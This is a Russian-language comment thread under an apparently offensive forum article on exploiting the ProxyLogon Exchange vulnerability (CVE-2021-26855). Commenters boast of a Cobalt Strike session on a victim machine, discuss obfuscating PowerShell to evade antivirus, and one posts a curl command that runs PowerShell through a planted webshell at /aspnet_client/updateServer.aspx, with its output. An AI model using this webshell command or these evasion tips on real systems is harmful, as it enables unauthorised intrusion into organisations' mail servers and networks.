Статья ProxyLogon & CVE-2021-26855

[tmaiconcff]

Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!

Может быть есть статьи которые ты можешь посоветовать, инструменты, книги, видео?

если можете посоветуйте статьи пожалуйста, c поиска не нашел

 

[gorillaz]

Большое спасибо за статью , есть ли больше информации про обсуфикацию ps ?

 

[gorillaz]

ну вариков много. в данной статье отписал самый быстрый и понятный метод, данный obfuscation дает твоему ps1 скрипту fud static, куда еще больше, по крайней мере результат выдает Антискан,

Спасибо

 

[gorillaz]

(+) Code: curl -ik https://url/aspnet_client/updateServer.aspx -d 'evilc0rp=Response.Write(new ActiveXObject("WScript.Shell").exec("powershell /c whoami").stdout.readall())'
Command=>
('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))
На всех такую вещь получаю, что может быть ?

 

[gorillaz]

пропатченный может быть, этот exploit уже убили к херам скорее всего

Печально

 

[Lisenok]

Всегда думал что с пабликом нет смысла работать, пока изучал, поменял свое мнение, главное знать куда искать немного везения и щепотку доработок под себя, тогда да. За статью и скрипты благодарю, всегда интересно как люди допиливают что то, в основном эксплоиты, примеры так скажем на "живую"))